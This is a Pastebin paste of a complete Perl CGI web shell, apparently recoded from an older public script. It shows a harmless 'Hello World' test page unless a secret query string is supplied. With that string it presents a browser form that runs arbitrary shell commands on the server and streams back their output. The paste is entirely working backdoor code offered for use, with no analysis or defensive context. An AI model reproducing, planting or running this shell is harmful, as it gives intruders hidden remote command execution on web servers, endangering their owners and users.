SHARE
TWEET

Untitled

Sl4ckerc0de Jun 6th, 2018 18,823 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. # Copyright (C) 2001 Rohitab Batra
  3. # Recoded By 0x1999
  4.  
  5. my $melex = $ENV{'QUERY_STRING'};
  6. if ($melex eq "cok") {
  7. $WinNT = 0;
  8. $NTCmdSep = "&";
  9. $UnixCmdSep = ";";
  10. $CommandTimeoutDuration = 10;
  11. $ShowDynamicOutput = 1;
  12. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  13. $CmdPwd = ($WinNT ? "cd" : "pwd");
  14. $PathSep = ($WinNT ? "\\" : "/");
  15. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  16. sub ReadParse
  17. {
  18.     local (*in) = @_ if @_;
  19.     local ($i, $loc, $key, $val);
  20.    
  21.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  22.  
  23.     if($ENV{'REQUEST_METHOD'} eq "GET")
  24.     {
  25.         $in = $ENV{'QUERY_STRING'};
  26.     }
  27.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  28.     {
  29.         binmode(STDIN) if $MultipartFormData & $WinNT;
  30.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  31.     }
  32.  
  33.     # handle file upload data
  34.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  35.     {
  36.         $Boundary = '--'.$1; # please refer to RFC1867
  37.         @list = split(/$Boundary/, $in);
  38.         $HeaderBody = $list[1];
  39.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  40.         $Header = $`;
  41.         $Body = $';
  42.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  43.         $in{'filedata'} = $Body;
  44.         $Header =~ /filename=\"(.+)\"/;
  45.         $in{'f'} = $1;
  46.         $in{'f'} =~ s/\"//g;
  47.         $in{'f'} =~ s/\s//g;
  48.  
  49.         # parse trailer
  50.         for($i=2; $list[$i]; $i++)
  51.         {
  52.             $list[$i] =~ s/^.+name=$//;
  53.             $list[$i] =~ /\"(\w+)\"/;
  54.             $key = $1;
  55.             $val = $';
  56.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  57.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  58.             $in{$key} = $val;
  59.         }
  60.     }
  61.     else # standard post data (url encoded, not multipart)
  62.     {
  63.         @in = split(/&/, $in);
  64.         foreach $i (0 .. $#in)
  65.         {
  66.             $in[$i] =~ s/\+/ /g;
  67.             ($key, $val) = split(/=/, $in[$i], 2);
  68.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  69.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  70.             $in{$key} .= "\0" if (defined($in{$key}));
  71.             $in{$key} .= $val;
  72.         }
  73.     }
  74. }
  75. sub PrintPageHeader
  76. {
  77.     $EncodedCurrentDir = $CurrentDir;
  78.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  79.     print "Content-type: text/html\n\n";
  80.     print <<END;
  81. <html>
  82. <head>
  83. <title>0x1999</title>
  84. $HtmlMetaHeader
  85. </head>
  86. <body onLoad="document.f.@_.focus()" bgcolor="#0A0A0A" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  87. <font color="#C0C0C0" size="3">
  88. END
  89. }
  90. sub PrintPageFooter
  91. {
  92.     print "</font></body></html>";
  93. }
  94. sub GetCookies
  95. {
  96.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  97.     foreach $cookie(@httpcookies)
  98.     {
  99.         ($id, $val) = split(/=/, $cookie);
  100.         $Cookies{$id} = $val;
  101.     }
  102. }
  103. sub PrintCommandLineInputForm
  104. {
  105.     $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  106.     print <<END;
  107. <code>
  108. <form name="f" method="POST" action="?cok">
  109. <input type="hidden" name="a" value="command">
  110. <input type="hidden" name="d" value="$CurrentDir">
  111. $Prompt
  112. <input type="text" name="c">
  113. <input type="submit" value="Enter">
  114. </form>
  115. </code>
  116. END
  117. }
  118. sub CommandTimeout
  119. {
  120.     if(!$WinNT)
  121.     {
  122.         alarm(0);
  123.         print <<END;
  124. </xmp>
  125. <code>
  126. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  127. <br>Killed it!
  128. <code>
  129. END
  130.         &PrintCommandLineInputForm;
  131.         &PrintPageFooter;
  132.         exit;
  133.     }
  134. }
  135. sub ExecuteCommand
  136. {
  137.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  138.     {
  139.         # we change the directory internally. The output of the
  140.         # command is not displayed.
  141.        
  142.         $OldDir = $CurrentDir;
  143.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  144.         chop($CurrentDir = `$Command`);
  145.         &PrintPageHeader("c");
  146.         $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  147.         print "<code>$Prompt $RunCommand</code>";
  148.     }
  149.     else # some other command, display the output
  150.     {
  151.         &PrintPageHeader("c");
  152.         $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  153.         print "<code>$Prompt $RunCommand</code><xmp>";
  154.         $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  155.         if(!$WinNT)
  156.         {
  157.             $SIG{'ALRM'} = \&CommandTimeout;
  158.             alarm($CommandTimeoutDuration);
  159.         }
  160.         if($ShowDynamicOutput) # show output as it is generated
  161.         {
  162.             $|=1;
  163.             $Command .= " |";
  164.             open(CommandOutput, $Command);
  165.             while(<CommandOutput>)
  166.             {
  167.                 $_ =~ s/(\n|\r\n)$//;
  168.                 print "$_\n";
  169.             }
  170.             $|=0;
  171.         }
  172.         else # show output after command completes
  173.         {
  174.             print `$Command`;
  175.         }
  176.         if(!$WinNT)
  177.         {
  178.             alarm(0);
  179.         }
  180.         print "</xmp>";
  181.     }
  182.     &PrintCommandLineInputForm;
  183.     &PrintPageFooter;
  184. }
  185. &ReadParse;
  186. &GetCookies;
  187. $ServerName = $ENV{'SERVER_NAME'};
  188.  
  189. $RunCommand = $in{'c'};
  190. $TransferFile = $in{'f'};
  191. $Options = $in{'o'};
  192. $Action = $in{'a'};
  193. $Action = "command" if($Action eq "");
  194. $CurrentDir = $in{'d'};
  195. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  196. if($Action eq "command") # user wants to run a command
  197. {
  198.     &ExecuteCommand;
  199. }
  200. }
  201. else
  202. {
  203.     print "Content-type: text/html\n\n";
  204.     print "<title>Test CGI</title>\n";
  205.     print "<h1>Hello World !!</h1>\n";
  206.     exit;
  207. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top